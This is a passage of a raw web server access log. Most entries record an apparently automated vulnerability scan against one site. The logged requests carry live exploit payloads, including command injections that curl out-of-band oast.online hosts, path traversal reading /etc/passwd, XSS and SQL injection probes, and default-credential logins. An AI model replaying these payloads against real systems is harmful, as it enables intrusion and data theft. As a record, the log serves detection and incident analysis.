-0400] "PUT /v1/kv/2w9rfWobH6bR7nYIzBCOsSF13xD HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:54:01 -0400] "GET /v1/kv/2w9rfWobH6bR7nYIzBCOsSF13xD?raw HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" 154.84.62.234 - - [24/Apr/2025:05:54:36 -0400] "POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:56:06 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:56:12 -0400] "POST /checkValid HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:56:20 -0400] "GET /public/css/2w9rfa6tr3kLpp8Z1C1okYMiqfJ.css HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0" 203.177.19.234 - - [24/Apr/2025:05:56:47 -0400] "GET /640275/about.php?ac=change_about_path&api=&path=&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:56:58 -0400] "GET /tos/index.php?user/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:57:09 -0400] "POST /wizard/initialise.php HTTP/1.1" 200 0 "https://mgrokokbet.id/tos/index.php?user/login" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:57:10 -0400] "GET /include/makecvs.php?Event=%60curl+http%3a//d04qr7ij4pq19d75k490eaosprch1ihjk.oast.online+-H+'User-Agent%3a+nLBnOT'%60 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:05:57:13 -0400] "GET /wp-content/plugins/canto/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:57:17 -0400] "GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//d04qr7ij4pq19d75k490zc4hc7y9kzukq.oast.online+-H+'User-Agent%3a+nLBnOT'%60 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:57:30 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:05:58:06 -0400] "POST /assets/_core/php/profile.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:58:13 -0400] "POST /assets/php/profile.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:05:58:21 -0400] "POST /vendor/qcubed/qcubed/assets/php/profile.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:58:48 -0400] "POST /goform/setSysAdm HTTP/1.1" 200 0 "https://mgrokokbet.id/login.shtml" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:05:58:53 -0400] "POST /convert HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:05:58:54 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:59:01 -0400] "GET /file/VihWan.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 154.84.62.234 - - [24/Apr/2025:05:59:02 -0400] "GET /server-common/cgi-bin/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:59:15 -0400] "POST /assets/php/upload.php HTTP/1.1" 403 1242 "http://mgrokokbet.id" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:59:22 -0400] "GET /assets/data/usrimg/2w9rfwaft59eybyulxoxfpqrsay.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19" 154.84.62.234 - - [24/Apr/2025:05:59:44 -0400] "POST /actions/authenticate.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:05:59:58 -0400] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:06:00:09 -0400] "GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:00:12 -0400] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:06:00:14 -0400] "GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:00:26 -0400] "POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5_3; en-US) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:00:27 -0400] "POST /auth/check HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:00:27 -0400] "GET /upload/userfiles/image/2w9rfWIyiiA6PyPrty9ZYo7CpKF.png HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_6; de) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:00:28 -0400] "GET /ext-js/index.html HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:00:57 -0400] "POST /auth/newpassword HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.25" 154.84.62.234 - - [24/Apr/2025:06:02:01 -0400] "POST /auth/requestreset HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:02:12 -0400] "POST /auth/requestreset HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/127.0.2 (x64 de)" 154.84.62.234 - - [24/Apr/2025:06:04:18 -0400] "GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:04:26 -0400] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:06:21 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0" 154.84.62.234 - - [24/Apr/2025:06:06:25 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:08:28 -0400] "GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" 154.84.62.234 - - [24/Apr/2025:06:09:04 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0" 154.84.62.234 - - [24/Apr/2025:06:09:28 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:06:09:44 -0400] "GET /wp-content/themes/15zine/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:06:10:47 -0400] "POST /dfsms/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 51.222.253.1 - - [24/Apr/2025:06:11:12 -0400] "GET /about.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 154.84.62.234 - - [24/Apr/2025:06:11:20 -0400] "POST /os/mxperson HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:11:26 -0400] "POST /meaweb/os/mxperson HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.6.18" 154.84.62.234 - - [24/Apr/2025:06:13:24 -0400] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.5.27" 154.84.62.234 - - [24/Apr/2025:06:14:04 -0400] "POST /magmi/web/magmi_saveprofile.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:14:18 -0400] "POST /magmi/web/magmi_run.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:06:14:26 -0400] "GET /magmi/web/info.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:16:26 -0400] "POST /EemAdminService/EemAdmin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:16:48 -0400] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux aarch64; rv:90.0) Gecko/20100101 Firefox/90.0" 154.84.62.234 - - [24/Apr/2025:06:16:57 -0400] "POST /AdminTools/querybuilder/logon?framework HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.24" 154.84.62.234 - - [24/Apr/2025:06:18:01 -0400] "GET /wp-content/plugins/ultimate-faqs/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:06:18:35 -0400] "GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.2.22" 154.84.62.234 - - [24/Apr/2025:06:19:03 -0400] "GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://d04qr7ij4pq19d75k490xszcn5baa3isg.oast.online%23 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:06:19:22 -0400] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:19:23 -0400] "POST /menu/stapp HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.26" 154.84.62.234 - - [24/Apr/2025:06:19:23 -0400] "POST /api/jsonws/invoke HTTP/1.1" 200 0 "https://mgrokokbet.id/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:06:19:23 -0400] "POST /api/jsonws/invoke HTTP/1.1" 200 0 "https://mgrokokbet.id/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 154.84.62.234 - - [24/Apr/2025:06:19:41 -0400] "POST /session/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:06:20:08 -0400] "POST /account/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.5.23" 154.84.62.234 - - [24/Apr/2025:06:20:19 -0400] "POST /opensis/index.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:20:28 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4) AppleWebKit/616.33 (KHTML, like Gecko) Version/17.6 Safari/616.33" 154.84.62.234 - - [24/Apr/2025:06:20:55 -0400] "GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1" 154.84.62.234 - - [24/Apr/2025:06:21:04 -0400] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/128.0 (x64 de)" 154.84.62.234 - - [24/Apr/2025:06:24:10 -0400] "GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:24:29 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:06:24:40 -0400] "GET /wp-admin/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:24:53 -0400] "GET /graph_realtime.php?action=init HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:06:24:57 -0400] "POST /getcfg.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:25:04 -0400] "POST /graphql HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.2.19" 154.84.62.234 - - [24/Apr/2025:06:25:04 -0400] "POST /webtools/control/xmlrpc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:06:25:13 -0400] "POST /webtools/control/xmlrpc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:06:25:34 -0400] "POST /upload HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:26:06 -0400] "POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0" 154.84.62.234 - - [24/Apr/2025:06:26:06 -0400] "GET /?author=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:26:13 -0400] "GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:06:26:13 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/128.0 (x64 de)" 154.84.62.234 - - [24/Apr/2025:06:26:20 -0400] "POST /storfs-asup HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:06:26:21 -0400] "GET /menu/neo HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:06:26:26 -0400] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:06:26:29 -0400] "GET /menu/stc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:26:34 -0400] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:26:39 -0400] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:26:48 -0400] "GET /hsqldb%0a HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:26:52 -0400] "POST /upload HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:26:57 -0400] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:27:10 -0400] "POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:27:19 -0400] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:06:27:27 -0400] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:06:27:44 -0400] "GET /images/..%2finfo.html HTTP/1.1" 200 0 "https://mgrokokbet.id/info.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:27:44 -0400] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d04qr7ij4pq19d75k4904qmjqob8gumaw.oast.online+-H+%27User-Agent:+Ro65vE%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d04qr7ij4pq19d75k490a1m3ng1sroroe.oast.online+-H+%27User-Agent:+Ro65vE%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:06:27:44 -0400] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d04qr7ij4pq19d75k490q7iwcz8i4z8ko.oast.online+-H+%27User-Agent:+Ro65vE%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d04qr7ij4pq19d75k490pykhp5hmgwpfo.oast.online+-H+%27User-Agent:+Ro65vE%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15" 156.146.62.37 - - [24/Apr/2025:06:28:20 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:06:28:47 -0400] "POST /apply_sec.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:06:28:51 -0400] "GET /images/..%2finfo.html HTTP/1.1" 200 0 "https://mgrokokbet.id/info.html" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:29:21 -0400] "GET /images/..%2finfo.html HTTP/1.1" 200 0 "https://mgrokokbet.id/info.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:06:29:29 -0400] "GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), HTTP/1.1" 200 0 